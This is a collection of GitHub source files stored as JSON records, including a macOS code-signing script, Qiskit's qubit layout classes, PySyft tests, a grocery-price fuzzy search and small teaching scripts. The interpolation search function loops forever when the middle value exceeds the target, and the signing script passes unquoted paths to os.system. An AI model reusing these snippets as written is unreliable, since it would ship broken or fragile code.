return self._pre_transform\n\n @pre_transform.setter\n def pre_transform(self, pre_transform: Optional[np.ndarray]) -> None:\n self._pre_transform = pre_transform\n\n @property\n def post_transform(self) -> Optional[np.ndarray]:\n return self._post_transform\n\n @post_transform.setter\n def post_transform(self, post_transform: Optional[np.ndarray]) -> None:\n self._post_transform = post_transform\n\n @property\n def current_transform(self) -> Optional[np.ndarray]:\n return self._current_transform\n\n @property\n def current_source_coords(self) -> Optional[pd.DataFrame]:\n return self._current_source_coords\n\n @property\n def current_transf_coords(self) -> Optional[pd.DataFrame]:\n return self._current_transf_coords\n","repo_name":"BodenmillerGroup/napping","sub_path":"napping/_napping_application.py","file_name":"_napping_application.py","file_ext":"py","file_size_in_byte":15691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"74545425015","text":"\"\"\"\nhttps://stackoverflow.com/questions/49748988/how-to-codesign-dmg-and-app-inside-it\nThis code helps with recursive code-signing of all files in a given directory\n\nExample command line may look like this\nExample command line may look like this\n\npython recursive_code_sign.py --directory=/Users/m/mini_cc3d_install_1/\n--certificate-label=\"Developer ID Application: Indiana University (XXX)\"\n--keychain-path=/Users/m/Library/Keychains/login.keychain-db\n\n\n\"\"\"\nimport argparse\nimport os\nfrom os.path import *\nfrom pathlib import Path\nimport subprocess\nimport numpy as np\n\n\ndef process_cml():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--directory', required=True, type=str)\n parser.add_argument('--certificate-label', required=True, type=str)\n parser.add_argument('--keychain-path', required=True)\n\n args = parser.parse_args()\n\n return args\n\ndef determine_if_binary_file(fname):\n core, ext = splitext(fname)\n if ext in ['.pyc', 'py']:\n return False\n\n if ext in ['.so', 'dylib']:\n return True\n\n textchars = bytearray({7,8,9,10,12,13,27} | set(range(0x20, 0x100)) - {0x7f})\n is_binary_string = lambda bytes: bool(bytes.translate(None, textchars))\n flag = is_binary_string(open(fname, 'rb').read(1024))\n\n return flag\n\ndef codesign_directory(directory, certificate_label, keychain_path):\n \"\"\"\n\n :param directory:\n :param certificate_label:\n :param keychain_path:\n :return:\n \"\"\"\n\n # traverse root directory, and list directories as dirs and files as files\n for root, dirs, files in os.walk(directory):\n\n path = root.split(os.sep)\n for file in files:\n stem, ext = splitext(file)\n\n fname = join(root, file)\n\n if not determine_if_binary_file(fname=fname):\n\n continue\n\n print(fname)\n # we enable hardened runtime using --options runtime\n # see https://stackoverflow.com/questions/52905940/how-to-codesign-and-enable-the-hardened-runtime-for-a-3rd-party-cli-on-xcode\n cmd = f'codesign -f -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n # cmd = f'codesign -f -v -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n os.system(cmd)\n\n\ndef codesign_directory_entitlement(directory, certificate_label, keychain_path, entitlement_file):\n \"\"\"\n\n :param directory:\n :param certificate_label:\n :param keychain_path:\n :param entitlement_file:\n :return:\n \"\"\"\n\n # traverse root directory, and list directories as dirs and files as files\n for root, dirs, files in os.walk(directory):\n\n path = root.split(os.sep)\n for file in files:\n stem, ext = splitext(file)\n\n fname = join(root, file)\n\n if not determine_if_binary_file(fname=fname):\n\n continue\n\n print(fname)\n # we enable hardened runtime using --options runtime\n # see https://stackoverflow.com/questions/52905940/how-to-codesign-and-enable-the-hardened-runtime-for-a-3rd-party-cli-on-xcode\n # cmd = f'codesign -f -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n # cmd = f'codesign -f --entitlement {entitlement_file} -v -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n # cmd = f'codesign -f --entitlement {entitlement_file} -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n cmd = f'codesign -v --options runtime --timestamp -s \"{certificate_label}\" -f --entitlement {entitlement_file} --keychain {keychain_path} {fname}'\n os.system(cmd)\n # cmd = f'codesign -f --entitlement {entitlement_file} -v -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n # os.system(cmd)\n\n # cmd = f'codesign -v --options runtime --timestamp -s \"{certificate_label}\" --keychain {keychain_path} {fname}'\n # os.system(cmd)\n # f'codesign -f --entitlement {entitlement_file}'\n # os.system(cmd)\n\n\n\n\ndef main():\n args = process_cml()\n directory = args.directory\n\n certificate_label = args.certificate_label\n keychain_path = args.keychain_path\n\n codesign_directory(directory=directory, certificate_label=certificate_label, keychain_path=keychain_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CompuCell3D/cc3d_build_scripts","sub_path":"mac/build_scripts_py3/rpath_handlers/recursive_code_sign.py","file_name":"recursive_code_sign.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32533487261","text":"\nr = open(\"header.txt\")\nls = r.readlines()\nr.close()\n\n# Es una lista normal!\n# El header es el elem 0 de la lista\n# Toda la list des del elemento 1 hasta el final\nls2 = ls[1:]\n\nsuma = 0\nfor l in ls2:\n nota = float(l.strip())\n suma += nota\n\nprint(\"PROMEDIO\",suma/len(ls2))\n\n'''\nr = open(\"header.txt\")\nls = r.readlines()\nr.close()\n\nsuma = 0\nfor l in ls:\n nota = float(l.strip())\n suma += nota\n\nprint(\"PROMEDIO\",suma/len(ls))\n'''\n\n\n\n\n\n\n\n\n","repo_name":"jorgedg6/material-computacion","sub_path":"INTRO A PYTHON/Codigos/10. Archivos/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32800945890","text":"import torch\n\nfrom syft.generic import object_storage\n\n\ndef test_clear_objects():\n \"\"\"\n Checks the clear_objects method\n \"\"\"\n # obj_storage is a wrapper object to a collection of objects\n obj_storage = object_storage.ObjectStore()\n\n x = torch.tensor(1)\n obj_storage.set_obj(x)\n\n objs = obj_storage.current_objects() # Returns a copy of the objects in obj_storage(here:x)\n\n assert len(objs) == 1\n assert objs[x.id] == x\n\n ret_val = obj_storage.clear_objects() # Completely removes all objects from obj_storage\n\n objs = obj_storage.current_objects()\n assert len(objs) == 0\n assert ret_val is None\n\n\ndef test_set_obj_takes_ownership(workers):\n me = workers[\"me\"]\n bob = workers[\"bob\"]\n\n x = torch.tensor(1)\n\n x.owner = bob\n\n me.object_store.set_obj(x)\n\n objs = me.object_store._objects\n\n assert objs[x.id] == x\n assert objs[x.id].owner == workers[\"me\"]\n","repo_name":"shazi4399/PySyft-a73b13aa84","sub_path":"test/generic/test_object_storage.py","file_name":"test_object_storage.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"6494515909","text":"# Python3 implementation of above approach\n\n# Instantiate the string\ns = \"Mr John Smith\"\n\n# Trim the given string\ns = s.strip()\n\n# Replace All space (unicode is \\\\s) to %20\ns = s.replace(' ', \"%20\")\n\n# Display the result\nprint(s)\n\n# This code is generated by Yvonne Onuorah\n","repo_name":"yvonneonu/test5","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26678174937","text":"from __future__ import annotations\nfrom typing import List\nfrom dataclasses import dataclass\n\nfrom qiskit import circuit\nfrom qiskit.circuit.quantumregister import Qubit, QuantumRegister\nfrom qiskit.transpiler.exceptions import LayoutError\nfrom qiskit.converters import isinstanceint\n\n\nclass Layout:\n \"\"\"Two-ways dict to represent a Layout.\"\"\"\n\n __slots__ = (\"_regs\", \"_p2v\", \"_v2p\")\n\n def __init__(self, input_dict=None):\n \"\"\"construct a Layout from a bijective dictionary, mapping\n virtual qubits to physical qubits\"\"\"\n self._regs = []\n self._p2v = {}\n self._v2p = {}\n if input_dict is not None:\n if not isinstance(input_dict, dict):\n raise LayoutError(\"Layout constructor takes a dict\")\n self.from_dict(input_dict)\n\n def __repr__(self):\n \"\"\"Representation of a Layout\"\"\"\n str_list = []\n for key, val in self._p2v.items():\n str_list.append(f\"{key}: {val},\")\n if str_list:\n str_list[-1] = str_list[-1][:-1]\n return \"Layout({\\n\" + \"\\n\".join(str_list) + \"\\n})\"\n\n def from_dict(self, input_dict):\n \"\"\"Populates a Layout from a dictionary.\n\n The dictionary must be a bijective mapping between\n virtual qubits (tuple) and physical qubits (int).\n\n Args:\n input_dict (dict):\n e.g.::\n\n {(QuantumRegister(3, 'qr'), 0): 0,\n (QuantumRegister(3, 'qr'), 1): 1,\n (QuantumRegister(3, 'qr'), 2): 2}\n\n Can be written more concisely as follows:\n\n * virtual to physical::\n\n {qr[0]: 0,\n qr[1]: 1,\n qr[2]: 2}\n\n * physical to virtual::\n\n {0: qr[0],\n 1: qr[1],\n 2: qr[2]}\n \"\"\"\n for key, value in input_dict.items():\n virtual, physical = Layout.order_based_on_type(key, value)\n self._p2v[physical] = virtual\n if virtual is None:\n continue\n self._v2p[virtual] = physical\n\n @staticmethod\n def order_based_on_type(value1, value2):\n \"\"\"decides which one is physical/virtual based on the type. Returns (virtual, physical)\"\"\"\n if isinstanceint(value1) and isinstance(value2, (Qubit, type(None))):\n physical = int(value1)\n virtual = value2\n elif isinstanceint(value2) and isinstance(value1, (Qubit, type(None))):\n physical = int(value2)\n virtual = value1\n else:\n raise LayoutError(\n \"The map (%s -> %s) has to be a (Bit -> integer)\"\n \" or the other way around.\" % (type(value1), type(value2))\n )\n return virtual, physical\n\n def __getitem__(self, item):\n if item in self._p2v:\n return self._p2v[item]\n if item in self._v2p:\n return self._v2p[item]\n raise KeyError(f\"The item {item} does not exist in the Layout\")\n\n def __contains__(self, item):\n return item in self._p2v or item in self._v2p\n\n def __setitem__(self, key, value):\n virtual, physical = Layout.order_based_on_type(key, value)\n self._set_type_checked_item(virtual, physical)\n\n def _set_type_checked_item(self, virtual, physical):\n old = self._v2p.pop(virtual, None)\n self._p2v.pop(old, None)\n old = self._p2v.pop(physical, None)\n self._v2p.pop(old, None)\n\n self._p2v[physical] = virtual\n if virtual is not None:\n self._v2p[virtual] = physical\n\n def __delitem__(self, key):\n if isinstance(key, int):\n del self._v2p[self._p2v[key]]\n del self._p2v[key]\n elif isinstance(key, Qubit):\n del self._p2v[self._v2p[key]]\n del self._v2p[key]\n else:\n raise LayoutError(\n \"The key to remove should be of the form\"\n \" Qubit or integer) and %s was provided\" % (type(key),)\n )\n\n def __len__(self):\n return len(self._p2v)\n\n def __eq__(self, other):\n if isinstance(other, Layout):\n return self._p2v == other._p2v and self._v2p == other._v2p\n return False\n\n def copy(self):\n \"\"\"Returns a copy of a Layout instance.\"\"\"\n layout_copy = type(self)()\n\n layout_copy._regs = self._regs.copy()\n layout_copy._p2v = self._p2v.copy()\n layout_copy._v2p = self._v2p.copy()\n\n return layout_copy\n\n def add(self, virtual_bit, physical_bit=None):\n \"\"\"\n Adds a map element between `bit` and `physical_bit`. If `physical_bit` is not\n defined, `bit` will be mapped to a new physical bit.\n\n Args:\n virtual_bit (tuple): A (qu)bit. For example, (QuantumRegister(3, 'qr'), 2).\n physical_bit (int): A physical bit. For example, 3.\n \"\"\"\n if physical_bit is None:\n if len(self._p2v) == 0:\n physical_bit = 0\n else:\n max_physical = max(self._p2v)\n # Fill any gaps in the existing bits\n for physical_candidate in range(max_physical):\n if physical_candidate not in self._p2v:\n physical_bit = physical_candidate\n break\n # If there are no free bits in the allocated physical bits add new ones\n else:\n physical_bit = max_physical + 1\n\n self[virtual_bit] = physical_bit\n\n def add_register(self, reg):\n \"\"\"Adds at the end physical_qubits that map each bit in reg.\n\n Args:\n reg (Register): A (qu)bit Register. For example, QuantumRegister(3, 'qr').\n \"\"\"\n self._regs.append(reg)\n for bit in reg:\n if bit not in self:\n self.add(bit)\n\n def get_registers(self):\n \"\"\"\n Returns the registers in the layout [QuantumRegister(2, 'qr0'), QuantumRegister(3, 'qr1')]\n Returns:\n Set: A set of Registers in the layout\n \"\"\"\n return set(self._regs)\n\n def get_virtual_bits(self):\n \"\"\"\n Returns the dictionary where the keys are virtual (qu)bits and the\n values are physical (qu)bits.\n \"\"\"\n return self._v2p\n\n def get_physical_bits(self):\n \"\"\"\n Returns the dictionary where the keys are physical (qu)bits and the\n values are virtual (qu)bits.\n \"\"\"\n return self._p2v\n\n def swap(self, left, right):\n \"\"\"Swaps the map between left and right.\n\n Args:\n left (tuple or int): Item to swap with right.\n right (tuple or int): Item to swap with left.\n Raises:\n LayoutError: If left and right have not the same type.\n \"\"\"\n if type(left) is not type(right):\n raise LayoutError(\"The method swap only works with elements of the same type.\")\n temp = self[left]\n self[left] = self[right]\n self[right] = temp\n\n def combine_into_edge_map(self, another_layout):\n \"\"\"Combines self and another_layout into an \"edge map\".\n\n For example::\n\n self another_layout resulting edge map\n qr_1 -> 0 0 <- q_2 qr_1 -> q_2\n qr_2 -> 2 2 <- q_1 qr_2 -> q_1\n qr_3 -> 3 3 <- q_0 qr_3 -> q_0\n\n The edge map is used to compose dags via, for example, compose.\n\n Args:\n another_layout (Layout): The other layout to combine.\n Returns:\n dict: A \"edge map\".\n Raises:\n LayoutError: another_layout can be bigger than self, but not smaller.\n Otherwise, raises.\n \"\"\"\n edge_map = {}\n\n for virtual, physical in self._v2p.items():\n if physical not in another_layout._p2v:\n raise LayoutError(\n \"The wire_map_from_layouts() method does not support when the\"\n \" other layout (another_layout) is smaller.\"\n )\n edge_map[virtual] = another_layout[physical]\n\n return edge_map\n\n def reorder_bits(self, bits) -> list[int]:\n \"\"\"Given an ordered list of bits, reorder them according to this layout.\n\n The list of bits must exactly match the virtual bits in this layout.\n\n Args:\n bits (list[Bit]): the bits to reorder.\n\n Returns:\n List: ordered bits.\n \"\"\"\n order = [0] * len(bits)\n\n # the i-th bit is now sitting in position j\n for i, v in enumerate(bits):\n j = self[v]\n order[i] = j\n\n return order\n\n @staticmethod\n def generate_trivial_layout(*regs):\n \"\"\"Creates a trivial (\"one-to-one\") Layout with the registers and qubits in `regs`.\n\n Args:\n *regs (Registers, Qubits): registers and qubits to include in the layout.\n Returns:\n Layout: A layout with all the `regs` in the given order.\n \"\"\"\n layout = Layout()\n for reg in regs:\n if isinstance(reg, QuantumRegister):\n layout.add_register(reg)\n else:\n layout.add(reg)\n return layout\n\n @staticmethod\n def from_intlist(int_list, *qregs):\n \"\"\"Converts a list of integers to a Layout\n mapping virtual qubits (index of the list) to\n physical qubits (the list values).\n\n Args:\n int_list (list): A list of integers.\n *qregs (QuantumRegisters): The quantum registers to apply\n the layout to.\n Returns:\n Layout: The corresponding Layout object.\n Raises:\n LayoutError: Invalid input layout.\n \"\"\"\n if not all(isinstanceint(i) for i in int_list):\n raise LayoutError(\"Expected a list of ints\")\n if len(int_list) != len(set(int_list)):\n raise LayoutError(\"Duplicate values not permitted; Layout is bijective.\")\n num_qubits = sum(reg.size for reg in qregs)\n # Check if list is too short to cover all qubits\n if len(int_list) != num_qubits:\n raise LayoutError(\n f\"Integer list length ({len(int_list)}) must equal number of qubits \"\n f\"in circuit ({num_qubits}): {int_list}.\"\n )\n out = Layout()\n main_idx = 0\n for qreg in qregs:\n for idx in range(qreg.size):\n out[qreg[idx]] = int_list[main_idx]\n main_idx += 1\n out.add_register(qreg)\n if main_idx != len(int_list):\n for int_item in int_list[main_idx:]:\n out[int_item] = None\n return out\n\n @staticmethod\n def from_qubit_list(qubit_list, *qregs):\n \"\"\"\n Populates a Layout from a list containing virtual\n qubits, Qubit or None.\n\n Args:\n qubit_list (list):\n e.g.: [qr[0], None, qr[2], qr[3]]\n *qregs (QuantumRegisters): The quantum registers to apply\n the layout to.\n Returns:\n Layout: the corresponding Layout object\n Raises:\n LayoutError: If the elements are not Qubit or None\n \"\"\"\n out = Layout()\n for physical, virtual in enumerate(qubit_list):\n if virtual is None:\n continue\n if isinstance(virtual, Qubit):\n if virtual in out._v2p:\n raise LayoutError(\"Duplicate values not permitted; Layout is bijective.\")\n out[virtual] = physical\n else:\n raise LayoutError(\"The list should contain elements of the Bits or NoneTypes\")\n for qreg in qregs:\n out.add_register(qreg)\n return out\n\n\n@dataclass\nclass TranspileLayout:\n r\"\"\"Layout attributes from output circuit from transpiler.\n\n The transpiler in general is unitary-perserving up to permutations caused\n by setting and applying initial layout during the :ref:`layout_stage`\n and :class:`~.SwapGate` insertion during the :ref:`routing_stage`. To\n provide an interface to reason about these permutations caused by\n the :mod:`~qiskit.transpiler`. In general the normal interface to access\n and reason about the layout transformations made by the transpiler is to\n use the helper methods defined on this class.\n\n For example, looking at the initial layout, the transpiler can potentially\n remap the order of the qubits in your circuit as it fits the circuit to\n the target backend. If the input circuit was:\n\n .. plot:\n :include-source:\n\n from qiskit.circuit import QuantumCircuit, QuantumRegister\n\n qr = QuantumRegister(3, name=\"MyReg\")\n qc = QuantumCircuit(qr)\n qc.h(0)\n qc.cx(0, 1)\n qc.cx(0, 2)\n qc.draw(\"mpl\")\n\n Then during the layout stage the transpiler reorders the qubits to be:\n\n .. plot:\n :include-source:\n\n from qiskit import QuantumCircuit\n\n qc = QuantumCircuit(3)\n qc.h(2)\n qc.cx(2, 1)\n qc.cx(2, 0)\n qc.draw(\"mpl\")\n\n then the output of the :meth:`.initial_virtual_layout` would be\n equivalent to::\n\n Layout({\n qr[0]: 2,\n qr[1]: 1,\n qr[2]: 0,\n })\n\n (it is also this attribute in the :meth:`.QuantumCircuit.draw` and\n :func:`.circuit_drawer` which is used to display the mapping of qubits to\n positions in circuit visualizations post-transpilation)\n\n Building on this above example for final layout, if the transpiler needed to\n insert swap gates during routing so the output circuit became:\n\n .. plot:\n :include-source:\n\n from qiskit import QuantumCircuit\n\n qc = QuantumCircuit(3)\n qc.h(2)\n qc.cx(2, 1)\n qc.swap(0, 1)\n qc.cx(2, 1)\n qc.draw(\"mpl\")\n\n then the output of the :meth:`routing_permutation` method would be::\n\n [1, 0, 2]\n\n which maps the qubits at each position to their final position after any swap\n insertions caused by routing.\n\n There are three public attributes associated with the class, however these\n are mostly provided for backwards compatibility and represent the internal\n state from the transpiler. They are defined as:\n\n * :attr:`initial_layout` - This attribute is used to model the\n permutation caused by the :ref:`layout_stage` it contains a\n :class:`~.Layout` object that maps the input :class:`~.QuantumCircuit`\\s\n :class:`~.circuit.Qubit` objects to the position in the output\n :class:`.QuantumCircuit.qubits` list.\n * :attr:`input_qubit_mapping` - This attribute is used to retain\n input ordering of the original :class:`~.QuantumCircuit` object. It\n maps the virtual :class:`~.circuit.Qubit` object from the original circuit\n (and :attr:`initial_layout`) to its corresponding position in\n :attr:`.QuantumCircuit.qubits` in the original circuit. This\n is needed when computing the permutation of the :class:`Operator` of\n the circuit (and used by :meth:`.Operator.from_circuit`).\n * :attr:`final_layout` - This is a :class:`~.Layout` object used to\n model the output permutation caused ny any :class:`~.SwapGate`\\s\n inserted into the :class:`~.QuantumCircuit` during the\n :ref:`routing_stage`. It maps the output circuit's qubits from\n :class:`.QuantumCircuit.qubits` in the output circuit to the final\n position after routing. It is **not** a mapping from the original\n input circuit's position to the final position at the end of the\n transpiled circuit. If you need this you can use the\n :meth:`.final_index_layout` to generate this. If this is set to ``None``\n this indicates that routing was not run and it can be considered\n equivalent to a trivial layout with the qubits from the output circuit's\n :attr:`~.QuantumCircuit.qubits` list.\n \"\"\"\n\n initial_layout: Layout\n input_qubit_mapping: dict[circuit.Qubit, int]\n final_layout: Layout | None = None\n _input_qubit_count: int | None = None\n _output_qubit_list: List[Qubit] | None = None\n\n def initial_virtual_layout(self, filter_ancillas: bool = False) -> Layout:\n \"\"\"Return a :class:`.Layout` object for the initial layout.\n\n This returns a mapping of virtual :class:`~.circuit.Qubit` objects in the input\n circuit to the physical qubit selected during layout. This is analogous\n to the :attr:`.initial_layout` attribute.\n\n Args:\n filter_ancillas: If set to ``True`` only qubits in the input circuit\n will be in the returned layout. Any ancilla qubits added to the\n output circuit will be filtered from the returned object.\n Returns:\n A layout object mapping the input circuit's :class:`~.circuit.Qubit`\n objects to the selected physical qubits.\n \"\"\"\n if not filter_ancillas:\n return self.initial_layout\n return Layout(\n {\n k: v\n for k, v in self.initial_layout.get_virtual_bits().items()\n if self.input_qubit_mapping[k] < self._input_qubit_count\n }\n )\n\n def initial_index_layout(self, filter_ancillas: bool = False) -> List[int]:\n \"\"\"Generate an initial layout as an array of integers\n\n Args:\n filter_ancillas: If set to ``True`` any ancilla qubits added\n to the transpiler will not be included in the output.\n\n Return:\n A layout array that maps a position in the array to its new position in the output\n circuit.\n \"\"\"\n\n virtual_map = self.initial_layout.get_virtual_bits()\n if filter_ancillas:\n output = [None] * self._input_qubit_count\n else:\n output = [None] * len(virtual_map)\n for index, (virt, phys) in enumerate(virtual_map.items()):\n if filter_ancillas and index >= self._input_qubit_count:\n break\n pos = self.input_qubit_mapping[virt]\n output[pos] = phys\n return output\n\n def routing_permutation(self) -> List[int]:\n \"\"\"Generate a final layout as an array of integers\n\n If there is no :attr:`.final_layout` attribute present then that indicates\n there was no output permutation caused by routing or other transpiler\n transforms. In this case the function will return a list of ``[0, 1, 2, .., n]``\n to indicate this\n\n Returns:\n A layout array that maps a position in the array to its new position in the output\n circuit\n \"\"\"\n if self.final_layout is None:\n return list(range(len(self._output_qubit_list)))\n virtual_map = self.final_layout.get_virtual_bits()\n return [virtual_map[virt] for virt in self._output_qubit_list]\n\n def final_index_layout(self, filter_ancillas: bool = True) -> List[int]:\n \"\"\"Generate the final layout as an array of integers\n\n This method will generate an array of final positions for each qubit in the output circuit.\n For example, if you had an input circuit like::\n\n qc = QuantumCircuit(3)\n qc.h(0)\n qc.cx(0, 1)\n qc.cx(0, 2)\n\n and the output from the transpiler was::\n\n tqc = QuantumCircuit(3)\n qc.h(2)\n qc.cx(2, 1)\n qc.swap(0, 1)\n qc.cx(2, 1)\n\n then the return from this function would be a list of::\n\n [2, 0, 1]\n\n because qubit 0 in the original circuit's final state is on qubit 3 in the output circuit,\n qubit 1 in the original circuit's final state is on qubit 0, and qubit 2's final state is\n on qubit. The output list length will be as wide as the input circuit's number of qubits,\n as the output list from this method is for tracking the permutation of qubits in the\n original circuit caused by the transpiler.\n\n Args:\n filter_ancillas: If set to ``False`` any ancillas allocated in the output circuit will be\n included in the layout.\n\n Returns:\n A list of final positions for each input circuit qubit\n \"\"\"\n if self._input_qubit_count is None:\n # TODO: After there is a way to differentiate the ancilla qubits added by the transpiler\n # don't use the ancilla name anymore.See #10817 for discussion on this.\n num_source_qubits = len(\n [\n x\n for x in self.input_qubit_mapping\n if getattr(x, \"_register\", \"\").startswith(\"ancilla\")\n ]\n )\n else:\n num_source_qubits = self._input_qubit_count\n if self._output_qubit_list is None:\n circuit_qubits = list(self.final_layout.get_virtual_bits())\n else:\n circuit_qubits = self._output_qubit_list\n\n pos_to_virt = {v: k for k, v in self.input_qubit_mapping.items()}\n qubit_indices = []\n if filter_ancillas:\n num_qubits = num_source_qubits\n else:\n num_qubits = len(self._output_qubit_list)\n for index in range(num_qubits):\n qubit_idx = self.initial_layout[pos_to_virt[index]]\n if self.final_layout is not None:\n qubit_idx = self.final_layout[circuit_qubits[qubit_idx]]\n qubit_indices.append(qubit_idx)\n return qubit_indices\n\n def final_virtual_layout(self, filter_ancillas: bool = True) -> Layout:\n \"\"\"Generate the final layout as a :class:`.Layout` object\n\n This method will generate an array of final positions for each qubit in the output circuit.\n For example, if you had an input circuit like::\n\n qc = QuantumCircuit(3)\n qc.h(0)\n qc.cx(0, 1)\n qc.cx(0, 2)\n\n and the output from the transpiler was::\n\n tqc = QuantumCircuit(3)\n qc.h(2)\n qc.cx(2, 1)\n qc.swap(0, 1)\n qc.cx(2, 1)\n\n then the return from this function would be a layout object::\n\n Layout({\n qc.qubits[0]: 2,\n qc.qubits[1]: 0,\n qc.qubits[2]: 1,\n })\n\n because qubit 0 in the original circuit's final state is on qubit 3 in the output circuit,\n qubit 1 in the original circuit's final state is on qubit 0, and qubit 2's final state is\n on qubit. The output list length will be as wide as the input circuit's number of qubits,\n as the output list from this method is for tracking the permutation of qubits in the\n original circuit caused by the transpiler.\n\n Args:\n filter_ancillas: If set to ``False`` any ancillas allocated in the output circuit will be\n included in the layout.\n\n Returns:\n A layout object mapping to the final positions for each qubit\n \"\"\"\n res = self.final_index_layout(filter_ancillas=filter_ancillas)\n pos_to_virt = {v: k for k, v in self.input_qubit_mapping.items()}\n return Layout({pos_to_virt[index]: phys for index, phys in enumerate(res)})\n","repo_name":"Qiskit/qiskit","sub_path":"qiskit/transpiler/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":23340,"program_lang":"python","lang":"en","doc_type":"code","stars":4020,"dataset":"github-code","pt":"22"} +{"seq_id":"43445759920","text":"import pandas as pd\nfrom rapidfuzz import fuzz\nfrom rapidfuzz import process\n\ndf = pd.read_csv('all_product_prices.csv')\ndf = df.drop_duplicates()\nproduct_names = df['product']\n\n#print(product_names.head())\nprod_list = product_names.to_list()\n\n#print(type(product_names))\nsearch_term = input(\"What product do you want to buy?\\n\")\n#search_term = search.lower()\n\nmatches = process.extract(search_term, prod_list, limit = 200, scorer = fuzz.partial_token_sort_ratio)\n\nsearch_results = []\nfor match in matches:\n if match[1] >= 80:\n search_results.append(match[0])\n\nprod_results = []\nfor prod in search_results:\n prod_info = df.loc[df['product'] == prod]\n product = prod_info['product'].to_list()\n price = prod_info['price'].to_list()\n store = prod_info['store'].to_list()\n prod_tuple = (product[0], price[0], store[0])\n prod_results.append(prod_tuple)\n\n#print(prod_results)\ndef merge_sort(lst):\n if len(lst) == 1:\n return lst\n elif len(lst) == 2:\n if lst[0][1] > lst[1][1]:\n lst[0], lst[1] = lst[1], lst[0]\n return lst\n \n left = lst[:len(lst)//2]\n right = lst[len(lst)//2:]\n\n merge_sort(left)\n merge_sort(right)\n\n lst = merge(lst, left, right)\n\n return lst\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n while i < len(arr):\n if j >= len(left):\n arr[i] = right[k]\n k += 1\n elif k >= len(right):\n arr[i] = left[j]\n j+=1\n elif left[j][1] > right[k][1]:\n arr[i] = right[k]\n k += 1\n elif left[j][1] <= right[k][1]:\n arr[i] = left[j]\n j += 1 \n i += 1\n return arr\nsorted = merge_sort(prod_results)\n\nprint(\"\\nHere are the cheapest items matching your search:\\n\")\n\ni = 1\nfor prod in sorted[:20]:\n print(f'{i}. {prod[0]} priced at ${prod[1]}, from {prod[2]}.')\n i+=1\n","repo_name":"msaad-a/cheapest-groceries","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"22025211994","text":"def interpolation_search(list_, item):\n \"\"\"\n :param list_: list to be searched\n :param item: element to be searched for\n :return: True if element is in list else False\n \"\"\"\n idx0 = 0\n idxn = (len(list_) - 1)\n while idx0 < idxn and list_[idx0] <= item <= list_[idxn]:\n # Find the Mid Point\n mid = idx0 + int(((float(idxn - idx0) / (list_[idxn] - list_[idx0])) * (item - list_[idx0])))\n # Compare the value at the mid point with the search item value\n if list_[mid] == item:\n return True\n if list_[mid] < item:\n idx0 = mid + 1\n return False\n","repo_name":"francis-eudy/sorting-and-searching-algorithms","sub_path":"interpolation_search.py","file_name":"interpolation_search.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14483447297","text":"from __future__ import unicode_literals\n\nfrom django.conf.urls import include, url\nfrom stackdio.api.volumes import api\nfrom stackdio.core import routers\n\nmodel_router = routers.SimpleBulkRouter()\nmodel_router.register(r'users',\n api.VolumeModelUserPermissionsViewSet,\n 'volume-model-user-permissions')\nmodel_router.register(r'groups',\n api.VolumeModelGroupPermissionsViewSet,\n 'volume-model-group-permissions')\n\n\nobject_router = routers.SimpleBulkRouter()\nobject_router.register(r'users',\n api.VolumeObjectUserPermissionsViewSet,\n 'volume-object-user-permissions')\nobject_router.register(r'groups',\n api.VolumeObjectGroupPermissionsViewSet,\n 'volume-object-group-permissions')\n\n\nurlpatterns = (\n url(r'^$',\n api.VolumeListAPIView.as_view(),\n name='volume-list'),\n\n url(r'^permissions/',\n include(model_router.urls)),\n\n url(r'^(?P[0-9]+)/$',\n api.VolumeDetailAPIView.as_view(),\n name='volume-detail'),\n\n url(r'^(?P[0-9]+)/permissions/',\n include(object_router.urls)),\n)\n","repo_name":"stackdio/stackdio","sub_path":"stackdio/api/volumes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"} +{"seq_id":"26536345016","text":"from typing import Any, Dict, List\n\nfrom numpy import random\nfrom pandas import DataFrame, Series\nfrom tqdm import tqdm\n\n\nclass ObsMatcher:\n def __init__(self, n_matches: int, caliper: float):\n \"\"\"\n create_match_df method -- finds similar observations and match between intervention and control\n Parameters\n ----------\n n_matches : int\n label_col the number of n controls for each minor class (intervention group)\n caliper : float\n label_col the minimal distance for matching between intervention and control\n :return\n matched Dataframe\n \"\"\"\n self.n_matches = n_matches\n self.caliper = caliper\n\n def create_matches_table(self, match_ids: Dict[str, List[Any]]) -> DataFrame:\n col_names: List[str] = [f\"matched_{i}\" for i in range(1, self.n_matches + 1)]\n print(\n f'please note:'\n f'the matched dataset contains {len(match_ids)} observations from minority class'\n )\n return DataFrame(match_ids.values(), index=match_ids.keys(), columns=col_names)\n\n def match_scores(self, p_scores: Series, label: Series) -> List[int]:\n intervention_group: Series = p_scores[label]\n control_group: Series = p_scores[~label]\n match_ids = {}\n print('starting matching process, this might take a time')\n for index, score in tqdm(intervention_group.items(), 